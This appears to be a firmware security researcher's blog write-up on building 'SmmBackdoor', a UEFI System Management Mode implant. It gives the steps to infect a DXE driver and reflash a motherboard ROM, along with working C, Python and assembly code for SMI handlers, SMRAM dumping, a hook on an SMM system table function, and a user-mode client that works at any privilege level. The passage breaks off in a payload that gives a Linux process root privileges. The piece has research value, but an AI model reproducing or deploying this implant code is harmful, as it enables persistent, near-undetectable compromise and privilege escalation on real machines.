To compile SmmBackdoor project:
  1. Run Visual Studio 2008 Command Prompt and cd to EDK2 directory.
  2. Execute Edk2Setup.bat --pull to configure build environment and download required binaries.
  3. cd SmmBackdoor && build
  4. After compilation resulting PE image file will be created at Build/OvmfX64/DEBUG_VS2008x86/X64/SmmBackdoor/SmmBackdoor/OUTPUT/SmmBackdoor.efi
To run SmmBackdoor.efi as infector payload:
  1. Open dumped flash image of test motherboard in UEFITool.
  2. Extract PE image of FFS file with GUID = 26A2481E-4424-46A2-9943-CC4039EAD8F8.
  3. Infect extracted image with SmmBackdoor.efi using Python infector.
  4. In UEFITool replace original PE image with infected one.
  5. Save modified flash image to file and write it to motherboard ROM chip using flashrom and SPI programmer or any other convenient way.

Debug messages


The tricky part of backdoor development was about getting it’s debug output somehow. Basically, there’s a two ways to solve this task:
  • Write debug output to COM port using I/O registers 3F8h:3FFh.
  • Write debug output to screen using EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL.
COM port of Intel DQ77KB board is connected to legacy port controller (super I/O) that talks to Q77 Platform Controller Hub (PCH) trough Low Pin Circuit (LPC) bus interface:

The problem is that firmware initializes this controller at relatively late stage of DXE phase, so, using COM port we will not see any debug messages of BackdoorEntry() and other functions that executing during SMM backdoor initialization. Of course, we can write a code that configures super I/O controller manually, but such code will be not very reliable because there’s too many different controller models with different configuration interfaces on the market.

EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL has the similar problems — it's not available during infected image initialization and during runtime phase as well (which is even more critical).

To deal with such unpleasant conditions I implemented debug messages sending functionality in following way:
  1. DbgMsg() function is trying to print each message to the screen and COM port always when it’s possible.
  2. If display and console I/O was not initialized yet — DbgMsg() saves message text into the global buffer.
  3. Firmware calls notification function that was registered during backdoor initialization when EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL becomes available, notification function initializes backdoor console I/O and prints saved messages from global buffer.
This approach allows us to see DXE phase debug messages on the screen and receive runtime phase debug messages over the COM port. Of course, such solution is not the most convenient one, but it should work on wide range of different boards without depending on infected image load order.

Example of on-screen debug messages in final version of SMM backdoor:


Communicating with SMM using SW SMI


Previously we talked only about SMRAM initialization part of SMM phase, second important part is SMI dispatch. All SMI handlers of UEFI SMM foundation and SMM protocols can be divided into three categories:
  • Root SMI controller handlers — main handlers that was registered by calling EFI_SMM_SYSTEM_TABLE2.SmiHandlerRegister() with NULL value of HandleType. This handlers are being called on every SMI generated on CPU. Usually, root SMI handler code determinates interrupt source and calls appropriate child SMI controller handler.
  • Child SMI controller handlers — handles single interrupt source. SMM protocol drivers registers such handlers by calling EFI_SMM_SYSTEM_TABLE2.SmiHandlerRegister() with non-NULL value of HandleType. Child handler of specific SMM protocol is calling SMI handlers that was registered using this protocol API.
  • SMI handlers — protocol specific handlers that can be registered and unregistered by other SMM drivers.
Platform Initialization Specification defines the following SMM child dispatch protocols:
  • EFI_SMM_SW_DISPATCH2_PROTOCOL — Provides dispatch service for SMI that was generated by writing a value to APMC I/O port B2h.
  • EFI_SMM_SX_DISPATCH2_PROTOCOL — Provides dispatch service for ACPI Sx events.
  • EFI_SMM_PERIODIC_TIMER_DISPATCH2_PROTOCOL — Provides dispatch service for APIC timer events.
  • EFI_SMM_USB_DISPATCH2_PROTOCOL — Provides dispatch service for USB bus events.
  • EFI_SMM_GPI_DISPATCH2_PROTOCOL — Provides dispatch service for General Purpose Input (GPI) SMI source.
  • EFI_SMM_STANDBY_BUTTON_DISPATCH2_PROTOCOL — Provides dispatch service for standby button SMI source.
  • EFI_SMM_POWER_BUTTON_DISPATCH2_PROTOCOL — Provides dispatch service for power button SMI source.
  • EFI_SMM_IO_TRAP_DISPATCH2_PROTOCOL — Provides dispatch service for I/O instruction restart events.
Of course, not all firmware vendors implements all these protocols, but most of them should be available on any UEFI compatible hardware.

The easiest way to communicate with SMM backdoor is triggering SMI using I/O port B2h. EFI_SMM_SW_DISPATCH2_PROTOCOL allows us to register a SMI handler that will be called when some code that running under operating system will write a number of the handler into this I/O port:
// software SMI handler number to communicate with the backdoor
#define BACKDOOR_SW_SMI_VAL 0xCC

// software SMI handler register context
EFI_SMM_SW_REGISTER_CONTEXT m_SwDispatch2RegCtx = { BACKDOOR_SW_SMI_VAL };

EFI_STATUS EFIAPI SwDispatch2Handler(
    EFI_HANDLE DispatchHandle,
    CONST VOID *Context,
    VOID *CommBuffer,
    UINTN *CommBufferSize)
{
    EFI_SMM_SW_CONTEXT *SwContext = (EFI_SMM_SW_CONTEXT *)CommBuffer;
    EFI_SMM_CPU_PROTOCOL *SmmCpu = NULL;
    EFI_STATUS Status = EFI_SUCCESS;

    DbgMsg(
        __FILE__, __LINE__, 
        __FUNCTION__"(): command port = 0x%X, data port = 0x%X\r\n",
        SwContext->CommandPort, SwContext->DataPort
    );

    // obtain SMM CPU protocol 
    Status = gSmst->SmmLocateProtocol(&gEfiSmmCpuProtocolGuid, NULL, (PVOID *)&SmmCpu);
    if (Status == EFI_SUCCESS)
    {
        UINT64 Rcx = 0;                

        // query RCX register value from CPU saved state
        Status = SmmCpu->ReadSaveState(
            SmmCpu, sizeof(Rcx), EFI_SMM_SAVE_STATE_REGISTER_RCX, 
            SwContext->SwSmiCpuIndex, (PVOID)&Rcx
        );
        if (EFI_ERROR(Status))
        {
            DbgMsg(__FILE__, __LINE__, "ReadSaveState() fails: 0x%X\r\n", Status);
            goto _end;
        }

        // handle backdoor request
        // ...
    }
    else
    {
        DbgMsg(__FILE__, __LINE__, "LocateProtocol() fails: 0x%X\r\n", Status);   
    }

_end:

    return EFI_SUCCESS;
}
//--------------------------------------------------------------------------------------
EFI_STATUS EFIAPI SwDispatch2ProtocolNotifyHandler(
    CONST EFI_GUID *Protocol, 
    VOID *Interface, 
    EFI_HANDLE Handle)
{
    EFI_STATUS Status = EFI_SUCCESS;
    EFI_HANDLE DispatchHandle = NULL;

    // obtain target protocol
    EFI_SMM_SW_DISPATCH2_PROTOCOL *SwDispatch = (EFI_SMM_SW_DISPATCH2_PROTOCOL *)Interface;    

    DbgMsg(__FILE__, __LINE__, "Max. SW SMI value is 0x%X\r\n", SwDispatch->MaximumSwiValue);

    // register software SMI handler
    Status = SwDispatch->Register(
        SwDispatch, 
        SwDispatch2Handler, 
        &m_SwDispatch2RegCtx,
        &DispatchHandle
    );
    if (Status == EFI_SUCCESS)
    {
        DbgMsg(__FILE__, __LINE__, "SW SMI handler is at "FPTR"\r\n", SwDispatch2Handler);
    }
    else
    {
        DbgMsg(__FILE__, __LINE__, "Register() fails: 0x%X\r\n", Status);
    }

    return EFI_SUCCESS;   
}
//--------------------------------------------------------------------------------------
VOID BackdoorEntrySmm(VOID)
{
    PVOID Registration = NULL;

    // ... skipped ...

    // register SMM protocol notification
    EFI_STATUS Status = gSmst->SmmRegisterProtocolNotify(
        &gEfiSmmSwDispatch2ProtocolGuid, 
        SwDispatch2ProtocolNotifyHandler, 
        &Registration
    );
    if (Status == EFI_SUCCESS)
    {
        DbgMsg(
            __FILE__, __LINE__, "SMM protocol notify handler is at "FPTR"\r\n",
            SwDispatch2ProtocolNotifyHandler
        );
    }
    else
    {
        DbgMsg(__FILE__, __LINE__, "RegisterProtocolNotify() fails: 0x%X\r\n", Status);
    }

    // ... skipped ...
}

As you can see, backdoor code calls EFI_SMM_SYSTEM_TABLE2.SmmRegisterProtocolNotify() function to be notified when EFI_SMM_SW_DISPATCH2_PROTOCOL will be available. Handler function calls EFI_SMM_SW_DISPATCH2_PROTOCOL.Register() function to register a SMI handler that will be called when CCh value will be written to B2h I/O port. SMI handler uses EFI_SMM_CPU_PROTOCOL to get CPU registers values from the saved execution state.

Now, when we can communicate with the backdoor, let’s implement some payload. The most obvious useful thing that we able to do from SMM — provide some interface to outside world for dumping of SMRAM contents. I designed this interface in following way:
  1. During initialization backdoor calls EFI_BOOT_SERVICES.AllocatePages() with EfiRuntimeServicesData value of MemType argument to allocate 2000h bytes of physical memory that will be available during DXE and runtime phase.
  2. Backdoor stores address of this memory inside firmware variable with constant name, so, operating system will be able to obtain the address using EFI_RUNTIME_SERVICES.GetVariable() function. Windows provides access to firmware variables with GetFirmwareEnvironmentVariable() function of kernel32.dll or ExGetFirmwareEnvironmentVariable() function of NT kernel. On Linux firmware variables are available as pseudo-files in /sys/firmware/efi/efivars (or /sys/firmware/efi/vars) directory that also can be mounted at other location using mount -t efivars none /some/path.
  3. Non-SMM code stores address of memory page to dump in CPU register and triggers SMI by writing constant command number to B2h I/O port.
  4. SwDispath2ProtocolNotifyHandler() backdoor function copies contents of memory page with specified address to previously allocated memory and exits from SMM.
  5. When SMI was fired — non-SMM code queries address of physical memory allocated by backdoor from firmware variable and gets contents of the dumped memory.
To provide a bit more of useful information to non-SMM code backdoor also stores the following structure at the beginning of the allocated memory:
typedef struct _BACKDOOR_INFO
{
    // number of SMI that was handled
    UINTN CallsCount;

    // EFI_STATUS of last operation
    UINTN BackdoorStatus;

    // List of structures with available SMRAM regions information.
    // Zero value of EFI_SMRAM_DESCRIPTOR.PhysicalStart means last item of list.
    EFI_SMRAM_DESCRIPTOR SmramMap[];

} BACKDOOR_INFO,
*PBACKDOOR_INFO;

To fill SmramMap field backdoor calls the EFI_SMM_ACCESS2_PROTOCOL.GetCapabilities() function that returns EFI_SMRAM_DESCRIPTOR structures with required information.

CHIPSEC, a firmware security assessment framework from Intel, provides a handy cross-platform Python API for different hardware and firmware features: reading of physical memory, EFI variables and PCI config space, SMI triggering, etc. Let’s write some backdoor communication code to utilize the SMRAM dumping feature:
import sys, os
from struct import pack, unpack

# path to the CHIPSEC folder
CHIPSEC_PATH = '/opt/chipsec/source/tool'

sys.path.append(CHIPSEC_PATH)

# SW SMI command value for communicating with backdoor SMM code
BACKDOOR_SW_SMI_VAL = 0xCC

# SW SMI commands for backdoor
BACKDOOR_SW_DATA_READ_PHYS_MEM  = 1 # read physical memory command

# EFI variable with struct _BACKDOOR_INFO physical address
BACKDOOR_INFO_EFI_VAR = 'SmmBackdoorInfo-3a452e85-a7ca-438f-a5cb-ad3a70c5d01b'
BACKDOOR_INFO_FMT = 'QQ'
BACKDOOR_INFO_LEN = 8 * 2

PAGE_SIZE = 0x1000

cs = None

class Chipsec(object):

    def __init__(self, uefi, mem, ints):

        self.uefi, self.mem, self.ints = uefi, mem, ints

def efi_var_get(name):

    # parse variable name string of name-GUID format
    name = name.split('-')

    return cs.uefi.get_EFI_variable(name[0], '-'.join(name[1:]), None)

# helpers for EFI variables with numeric value
efi_var_get_8 = lambda name: unpack('B', efi_var_get(name))[0]
efi_var_get_16 = lambda name: unpack('H', efi_var_get(name))[0]
efi_var_get_32 = lambda name: unpack('I', efi_var_get(name))[0]
efi_var_get_64 = lambda name: unpack('Q', efi_var_get(name))[0]

def mem_read(addr, size): 

    return cs.mem.read_phys_mem(addr, size)

# helpers to read numeric values from physical memory
mem_read_8 = lambda addr: unpack('B', mem_read(addr, 1))[0]
mem_read_16 = lambda addr: unpack('H', mem_read(addr, 2))[0]
mem_read_32 = lambda addr: unpack('I', mem_read(addr, 4))[0]
mem_read_64 = lambda addr: unpack('Q', mem_read(addr, 8))[0]

def get_backdoor_info_addr():

    # retuen address of the physical memory with BACKDOOR_INFO structure
    return efi_var_get_64(BACKDOOR_INFO_EFI_VAR)

def get_backdoor_info(addr = None):

    addr = get_backdoor_info_addr() if addr is None else addr

    # return BACKDOOR_INFO structure fields values
    return unpack(BACKDOOR_INFO_FMT, mem_read(addr, BACKDOOR_INFO_LEN))

def get_backdoor_info_mem(addr = None):

    addr = get_backdoor_info_addr() if addr is None else addr

    # return the raw data of BACKDOOR_INFO structure
    return mem_read(addr + PAGE_SIZE, PAGE_SIZE)

def get_smram_info():

    ret = []  
    backdoor_info = get_backdoor_info_addr()  
    addr, size = backdoor_info + BACKDOOR_INFO_LEN, 8 * 4    

    # dump array of EFI_SMRAM_DESCRIPTOR structures
    while True:

        '''
            typedef struct _EFI_SMRAM_DESCRIPTOR 
            {
                EFI_PHYSICAL_ADDRESS PhysicalStart; 
                EFI_PHYSICAL_ADDRESS CpuStart; 
                UINT64 PhysicalSize; 
                UINT64 RegionState;

            } EFI_SMRAM_DESCRIPTOR;
        '''            
        physical_start, cpu_start, physical_size, region_state = \
            unpack('Q' * 4, mem_read(addr, size))            

        if physical_start == 0:

            # no more items
            break

        ret.append(( physical_start, physical_size, region_state ))
        addr += size

    return ret

def send_sw_smi(command, data, arg):

    # generate software SMI: data will be written to B2h port, arg will be copied to RCX
    cs.ints.send_SW_SMI(command, data, 0, 0, arg, 0, 0, 0)

def dump_mem_page(addr, count = None):

    ret = ''
    backdoor_info = get_backdoor_info_addr()
    count = 1 if count is None else count    

    # dump specified amount of memory pages starting from addr
    for i in range(count):

        # send read memory page command to SMM code
        page_addr = addr + PAGE_SIZE * i
        send_sw_smi(BACKDOOR_SW_SMI_VAL, BACKDOOR_SW_DATA_READ_PHYS_MEM, page_addr)

        # read dumped page from physical memory
        _, last_status = get_backdoor_info(addr = backdoor_info)
        if last_status != 0:

            raise Exception('SMM backdoor error 0x%.8x' % last_status)

        ret += get_backdoor_info_mem(addr = backdoor_info)

    return ret

def dump_smram():

    try:

        contents = []

        print '[+] Dumping SMRAM regions, this may take a while...'

        # enumerate and dump available SMRAM regions
        for region in get_smram_info():        
            
            region_addr, region_size, _ = region
            name = 'SMRAM_dump_%.8x_%.8x.bin' % (region_addr, region_addr + region_size - 1)

            # dump region contents            
            data = dump_mem_page(region_addr, region_size / PAGE_SIZE)

            contents.append(( name, data ))

        # save dumped data to files
        for name, data in contents:

            with open(name, 'wb') as fd:

                print '[+] Creating', name
                fd.write(data) 

    except IOError, why:

        print '[!]', str(why)
        return False

def chipsec_init():

    global cs

    # import CHIPSEC modules
    import chipsec.chipset
    import chipsec.hal.uefi
    import chipsec.hal.physmem
    import chipsec.hal.interrupts

    # initialize helper
    _cs = chipsec.chipset.cs()
    _cs.init(None, True)
    
    cs = Chipsec(chipsec.hal.uefi.UEFI(_cs.helper),
                 chipsec.hal.physmem.Memory(_cs.helper),
                 chipsec.hal.interrupts.Interrupts(_cs))

if __name__ == '__main__':
    
    chipsec_init()
    dump_smram()

I implemented a small program called SmmBackdoor.py that allows to infect extracted DXE drivers with backdoor code and interact with installed backdoor using software SMI. Available command line options:
  • SmmBackdoor.py --infect <source_path> --output <dest_path> --payload SmmBackdoor.efi — Infect PE image of DXE driver with backdoor code.
  • SmmBackdoor.py --test — check for backdoor presence and print status information from BACKDOOR_INFO structure.
  • SmmBackdoor.py --dump-smram — dump all available SMRAM regions into the files.
  • SmmBackdoor.py --read-phys <address> — print hexadecimal dump of physical memory page at given address.
  • SmmBackdoor.py --read-virt <address> — print hexadecimal dump of virtual memory page at given address.
Usage example — dumping CSEG and TSEG regions of SMRAM:


Probably, you already noticed that software SMI communication method has a serious limitation: we need to be a root/Administator to trigger SMI and get access to physical memory. It's still good if you planning to use such backdoor for research or reverse engineering, but for offensive purposes we need to find some better way to call the backdoor code that will work with any privileges level.

Communicating with SMM using APIC timer


After discovering of available SMM child dispatch protocols capabilities I figured that EFI_SMM_PERIODIC_TIMER_DISPATCH2_PROTOCOL allows to configure Advanced Programmable Interrupt Controller (APIC) timer to fire SMI with specified time intervals, so, it's possible to implement the following communication method:
  1. Non-SMM code copies backdoor command arguments with the magic constants to CPU registers and jumps into infinite loop.
  2. When SMI timer handler that was registered by backdoor with EFI_SMM_PERIODIC_TIMER_DISPATCH2_PROTOCOL.Register() function is being called — it checks saved execution context for register values with magic constants, if they was found — it executes specified command and modifies saved instruction pointer value to let the non-SMM code quit from infinite loop.
  3. Backdoor also can do virtual to physical address translation to copy some return data to buffer that was passed from non-SMM code.
The client code for this method will be simple enough, without dependencies on any API or execution environment. It works with any privileges level — from sandboxed user mode applications to ring 0 code.

Backdoor code that registers the SMI timer handler:
// periodic timer global vars
EFI_HANDLE m_PeriodicTimerDispatchHandle = NULL;
EFI_SMM_PERIODIC_TIMER_DISPATCH2_PROTOCOL *m_PeriodicTimerDispatch = NULL;

/*
    SMM periodic timer registration context with Period and TickInterval values.
    Read EFI_SMM_PERIODIC_TIMER_DISPATCH2_PROTOCOL description information volume 4
    of Platform Initialization Specification for more information about them.
*/
EFI_SMM_PERIODIC_TIMER_REGISTER_CONTEXT m_PeriodicTimerDispatch2RegCtx = { 1000000, 640000 };

/*
    Structure that holds values of control registers from CPU saved state,
    this values are used in virtual to physical address translation code.
*/
typedef struct _CONTROL_REGS
{
    UINT64 Cr0, Cr3, Cr4;

} CONTROL_REGS,
*PCONTROL_REGS;

// macro to read register value from CPU execution state that was saved to SMRAM
#define READ_SAVE_STATE(_id_, _var_)                                                \
                                                                                    \
    Status = SmmCpu->ReadSaveState(SmmCpu,                                          \
        sizeof((_var_)), (_id_), gSmst->CurrentlyExecutingCpu, (PVOID)&(_var_));    \
                                                                                    \
    if (EFI_ERROR(Status))                                                          \
    {                                                                               \
        DbgMsg(__FILE__, __LINE__, "ReadSaveState() fails: 0x%X\r\n", Status);      \
        goto _end;                                                                  \
    }

// macro to modify register value of CPU execution state
#define WRITE_SAVE_STATE(_id_, _var_, _val_)                                        \
                                                                                    \
    (_var_) = (UINT64)(_val_);                                                      \
    Status = SmmCpu->WriteSaveState(SmmCpu,                                         \
        sizeof((_var_)), (_id_), gSmst->CurrentlyExecutingCpu, (PVOID)&(_var_));    \
                                                                                    \
    if (EFI_ERROR(Status))                                                          \
    {                                                                               \
        DbgMsg(__FILE__, __LINE__, "WriteSaveState() fails: 0x%X\r\n", Status);     \
        goto _end;                                                                  \
    }

#define MAX_JUMP_SIZE 6

EFI_STATUS EFIAPI PeriodicTimerDispatch2Handler(
    EFI_HANDLE DispatchHandle, CONST VOID *Context,
    VOID *CommBuffer, UINTN *CommBufferSize)
{
    EFI_STATUS Status = EFI_SUCCESS;   
    EFI_SMM_CPU_PROTOCOL *SmmCpu = NULL;    

    // obtain SMM CPU protocol 
    Status = gSmst->SmmLocateProtocol(&gEfiSmmCpuProtocolGuid, NULL, (PVOID *)&SmmCpu);
    if (Status == EFI_SUCCESS)
    {
        CONTROL_REGS ControlRegs;
        UINT64 Rax = 0, Rcx = 0, Rdx = 0, Rdi = 0, Rsi = 0, R8 = 0, R9 = 0;        

        READ_SAVE_STATE(EFI_SMM_SAVE_STATE_REGISTER_CR0, ControlRegs.Cr0);
        READ_SAVE_STATE(EFI_SMM_SAVE_STATE_REGISTER_CR3, ControlRegs.Cr3);
        READ_SAVE_STATE(EFI_SMM_SAVE_STATE_REGISTER_CR4, ControlRegs.Cr4);
        READ_SAVE_STATE(EFI_SMM_SAVE_STATE_REGISTER_RCX, Rcx); // user-mode instruction pointer
        READ_SAVE_STATE(EFI_SMM_SAVE_STATE_REGISTER_RDI, Rdi); // 1-st param (code)
        READ_SAVE_STATE(EFI_SMM_SAVE_STATE_REGISTER_RSI, Rsi); // 2-nd param (arg1)
        READ_SAVE_STATE(EFI_SMM_SAVE_STATE_REGISTER_RDX, Rdx); // 3-rd param (arg2)
        READ_SAVE_STATE(EFI_SMM_SAVE_STATE_REGISTER_R8, R8); // 1-st magic constant
        READ_SAVE_STATE(EFI_SMM_SAVE_STATE_REGISTER_R9, R9); // 2-nd magic constant       

        /* 
            Check for magic values that was set in smm_call(),
            see smm_call/smm_call.asm for more info.
        */
        if (R8 == BACKDOOR_SMM_CALL_R8_VAL && R9 == BACKDOOR_SMM_CALL_R9_VAL)
        {            
            DbgMsg(
                __FILE__, __LINE__, 
                "smm_call(): CPU #%d, RDI = 0x%llx, RSI = 0x%llx, RDX = 0x%llx\r\n", 
                gSmst->CurrentlyExecutingCpu, Rdi, Rsi, Rdx
            );

            // handle backdoor control request
            // ...

            // set smm_call() return value
            WRITE_SAVE_STATE(EFI_SMM_SAVE_STATE_REGISTER_RAX, Rax, Status);

            // let the code to exit from infinite loop
            WRITE_SAVE_STATE(EFI_SMM_SAVE_STATE_REGISTER_RCX, Rcx, Rcx - MAX_JUMP_SIZE);
        }
    }
    else
    {
        DbgMsg(__FILE__, __LINE__, "LocateProtocol() fails: 0x%X\r\n", Status);   
    }

_end:

    return EFI_SUCCESS;
}
//--------------------------------------------------------------------------------------
EFI_STATUS PeriodicTimerDispatch2Register(EFI_HANDLE *DispatchHandle)
{
    EFI_STATUS Status = EFI_INVALID_PARAMETER;  

    if (m_PeriodicTimerDispatch)
    {
        // register periodic timer routine
        Status = m_PeriodicTimerDispatch->Register(
            m_PeriodicTimerDispatch, 
            PeriodicTimerDispatch2Handler, 
            &m_PeriodicTimerDispatch2RegCtx,
            DispatchHandle
        );
        if (Status == EFI_SUCCESS)
        {
            DbgMsg(
                __FILE__, __LINE__, "SMM timer handler is at "FPTR"\r\n", 
                PeriodicTimerDispatch2Handler
            );
        }
        else
        {
            DbgMsg(__FILE__, __LINE__, "Register() fails: 0x%X\r\n", Status);
        }
    }    

    return Status;
}
//--------------------------------------------------------------------------------------
EFI_STATUS PeriodicTimerDispatch2Unregister(EFI_HANDLE DispatchHandle)
{
    EFI_STATUS Status = EFI_INVALID_PARAMETER;  

    if (m_PeriodicTimerDispatch)
    {
        // unregister periodic timer routine
        Status = m_PeriodicTimerDispatch->UnRegister(
            m_PeriodicTimerDispatch, 
            DispatchHandle
        );
        if (Status == EFI_SUCCESS)
        {
            DbgMsg(__FILE__, __LINE__, "SMM timer handler unregistered\r\n");
        }
        else
        {
            DbgMsg(__FILE__, __LINE__, "Unregister() fails: 0x%X\r\n", Status);
        }
    }    

    return Status;
}
//--------------------------------------------------------------------------------------
EFI_STATUS EFIAPI PeriodicTimerDispatch2ProtocolNotifyHandler(
    CONST EFI_GUID *Protocol, 
    VOID *Interface, 
    EFI_HANDLE Handle)
{
    EFI_STATUS Status = EFI_SUCCESS;   
    UINT64 *SmiTickInterval = NULL;

    // obtain target protocol
    m_PeriodicTimerDispatch = 
        (EFI_SMM_PERIODIC_TIMER_DISPATCH2_PROTOCOL *)Interface;   

    // enable periodic timer SMI
    PeriodicTimerDispatch2Register(m_PeriodicTimerDispatchHandle);       

    return EFI_SUCCESS;   
}
//--------------------------------------------------------------------------------------
VOID BackdoorEntrySmm(VOID)
{
    PVOID Registration = NULL;

    // ... skipped ...

    // register SMM protocol notification
    EFI_STATUS Status = gSmst->SmmRegisterProtocolNotify(
        &gEfiSmmPeriodicTimerDispatch2ProtocolGuid, 
        PeriodicTimerDispatch2ProtocolNotifyHandler, 
        &Registration
    );
    if (Status == EFI_SUCCESS)
    {
        DbgMsg(
            __FILE__, __LINE__, "SMM protocol notify handler is at "FPTR"\r\n",
            PeriodicTimerDispatch2ProtocolNotifyHandler
        );
    }
    else
    {
        DbgMsg(__FILE__, __LINE__, "RegisterProtocolNotify() fails: 0x%X\r\n", Status);
    }

    // ... skipped ...
}

When I started my board with this code first time — I figured that periodic timer initializes and works fine, but it stops generating SMI during operating system (64-bit Linux) load. Such behaviour is easy explainable: during early boot OS kernel overrides APIC controller settings and apparently destroys our timer that was configured by infected firmware. Because there is no easy/documented ways to protect APIC configuration from changing by operating system — we need to find a way to re-initialize the timer from SMM code at more late stage of kernel initialization.

I spent some time with hooking and monitoring of SMST functions and figured that during late stage of on-board hardware initialization my firmware code calls EFI_SMM_SYSTEM_TABLE2.SmmLocateProtocol() function to find a protocol with GUID = 3EF7500E-CF55-474F-8E7E009E0EACECD2 (Google says that it’s internal vendor name is AMI_USB_SMM_PROTOCOL_GUID). Because APIC was already initialized by kernel at this point — I implemented backdoor code that hooks EFI_SMM_SYSTEM_TABLE2.SmmLocateProtocol() and re-installs our periodic timer inside of hook handler function:
#define AMI_USB_SMM_PROTOCOL_GUID { 0x3ef7500e, 0xcf55, 0x474f, \
                                    { 0x8e, 0x7e, 0x00, 0x9e, 0x0e, 0xac, 0xec, 0xd2 }}

EFI_LOCATE_PROTOCOL old_SmmLocateProtocol = NULL;

EFI_STATUS EFIAPI new_SmmLocateProtocol(
    EFI_GUID *Protocol,
    VOID *Registration,
    VOID **Interface)
{        
    EFI_GUID TargetGuid = AMI_USB_SMM_PROTOCOL_GUID;

    /*
        Totally board-specific hack for Intel DQ77KB, SmmLocateProtocol
        with AMI_USB_SMM_PROTOCOL_GUID is being called during OS startup after
        APIC init, so, here we can register our SMI timer.
    */
    if (Protocol && !memcmp(Protocol, &TargetGuid, sizeof(TargetGuid)))
    {
        DbgMsg(__FILE__, __LINE__, __FUNCTION__"()\r\n");

        if (m_PeriodicTimerDispatchHandle)
        {
            // unregister previously registered timer
            PeriodicTimerDispatch2Unregister(m_PeriodicTimerDispatchHandle);
            m_PeriodicTimerDispatchHandle = NULL;
        }

        // enable periodic timer SMI again
        PeriodicTimerDispatch2Register(&m_PeriodicTimerDispatchHandle);

        // remove the hook
        gSmst->SmmLocateProtocol = old_SmmLocateProtocol;       
    }    

    // call original function
    return old_SmmLocateProtocol(Protocol, Registration, Interface);
}
//--------------------------------------------------------------------------------------
VOID BackdoorEntrySmm(VOID)
{
    PVOID Registration = NULL;

    // ... skipped ...

    // hook SmmLocateProtocol() SMST function to execute backdoor code during OS startup
    old_SmmLocateProtocol = gSmst->SmmLocateProtocol;
    gSmst->SmmLocateProtocol = new_SmmLocateProtocol;

    // ... skipped ...
}

Of course, such dirty and totally board specific hack is not very good for backdoor reliability, but it has no impact on platform stability and it’s code is not complicated at all. If you have any ideas how to solve this APIC problem in more portable way and let the timer settings to survive OS load — please let me know :)

Client code for this communication method is written in C and ASM, before jump to infinite loop it calls sched_setaffinity() Linux function to be sure that scheduler will run our loop on the first CPU:
#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <sched.h>
#include <errno.h>
#include <string.h>
#include <inttypes.h>
#include <unistd.h>

// external function implemented in assembly
extern int smm_call(long code, unsigned long long arg1, unsigned long long arg2);

int main(int argc, char *argv[])
{
    int ret = 0;    
    cpu_set_t mask;

    CPU_ZERO(&mask);
    CPU_SET(0, &mask);

    // tells to the scheduler to run current process only on first CPU
    ret = sched_setaffinity(0, sizeof(mask), &mask);
    if (ret != 0)
    {
        printf("sched_setaffinity() ERROR %d\n", errno);
        return errno; 
    }

    int code = 0;
    unsigned long long arg1 = 0, arg2 = 0;

    /*
        Parse arguments for SMM backdoor call from command line arguments.
    */

    if (argc >= 2)
    {
        if ((code = strtol(argv[1], NULL, 16)) == 0 && errno == EINVAL)
        {
            printf("strtol() ERROR %d\n", errno);
            return errno; 
        }
    }

    if (argc >= 3)
    {
        if ((arg1 = strtoull(argv[2], NULL, 16)) == 0 && errno == EINVAL)
        {
            printf("strtoull() ERROR %d\n", errno);
            return errno; 
        }
    }

    if (argc >= 4)
    {
        if ((arg2 = strtoull(argv[3], NULL, 16)) == 0 && errno == EINVAL)
        {
            printf("strtoull() ERROR %d\n", errno);
            return errno; 
        }
    }    

    printf(
        "Calling SMM backdoor with code = 0x%x and args 0x%llx, 0x%llx...\n", 
        code, arg1, arg2
    );

    /* 
        Jump to infinite loop to call SMM backdoor.
        If backdoor is not available - this function hangs forever.
    */
    ret = smm_call(code, arg1, arg2);

    printf("Sucess! Status code: 0x%.8x\n", ret);

    return ret;
}

Assembly part of client code:
BITS 64
GLOBAL smm_call

;
; Magic values that backdoor checks for.
;
%define R8_VAL 0x4141414141414141
%define R9_VAL 0x4242424242424242

;
; int smm_call(long code, unsigned long long arg1, unsigned long long arg2)
;
; Sends control request with specified code and argument to
; SMM backdoor.
;
; Returns EFI_STATUS of requested operation.
;
smm_call:

    push   rcx
    push   r8
    push   r9

    ; SMI timer handler checks R8 and R9 for this magic values
    mov    r8, R8_VAL
    mov    r9, R9_VAL

    xor    rax, rax
    dec    rax

    ; jump in infinite loop with RCX as instruction address
    mov    rcx, _loop
    jmp    rcx

    ; landing area for modified RCX value
    nop
    nop
    nop
    nop
    nop
    nop
    jmp    short _end

_loop:
    ;
    ; SMI timer handler will be called when process runs in 
    ; infinite loop with magic registers values. SMM backdoor 
    ; decrements RCX value (--> jmp _end) to exit from the loop.
    ; Code and Arg for SmmCallHandle() are going in RDI and RSI.
    ;
    nop
    jmp    rcx

_end:

    pop    r9
    pop    r8
    pop    rcx

    ; SMM backdoor returns status code in RAX register
    ret

Backdoor registers periodic timer SMI handler at startup automatically, but it’s possible to ask the backdoor enable or disable it during runtime phase using SmmBackdoor.py program that was mentioned above:
  • SmmBackdoor.py --timer-enable — enable periodic timer SMI.
  • SmmBackdoor.py --timer-disable — disable periodic timer SMI.

More advanced payload example 


When we have SMM communication code that works with any privileges levels it will be pretty reasonable to improve the backdoor and write payload that accepts a command from attacker’s user mode Linux process and gives it the root privileges.

To get privileges of current process Linux uses sys_getuid(), sys_geteuid(), sys_getgid() and sys_getegid() syscalls, lets check their assembly code on example of sys_getuid():
sys_getuid:

65 48 8b 04 25 00 c7 00 00     mov %gs:0xc700, %rax      ; get task_struct
48 8b 80 88 03 00 00           mov 0x388(%rax), %rax     ; get task_struct->cred
8b 40 04                       mov 0x4(%rax), %eax       ; get desired value from cred
c3                             retq

As you can see, kernel gets task_struct structure address for current process from GS segment and obtains current user and group information from task_struct->cred.uid, task_struct->cred.euid, task_struct->cred.gid and task_struct->cred.egid fields.

SMM backdoor code that needs to modify cred values from SMI handler apparently relies on their offsets that might be changed across different builds and versions of Linux kernel. To avoid the huge amount of OS specific logic in backdoor code it receives the addresses of sys_getuid(), sys_geteuid(), sys_getgid() and sys_getegid() kernel functions from client and extracts required fields offsets from their binary code. To give process root privileges backdoor just sets these fields values to zero:
/* 
    Dispatch SMM backdoor command from SW SMI or periodic timer handler.
    Code, Arg1 and Arg2 usually comes from CPU register values that was set by backdoor client.
*/
EFI_STATUS SmmCallHandle(UINT64 Code, UINT64 Arg1, UINT64 Arg2, PCONTROL_REGS ControlRegs)
{
    EFI_STATUS Status = EFI_INVALID_PARAMETER;    

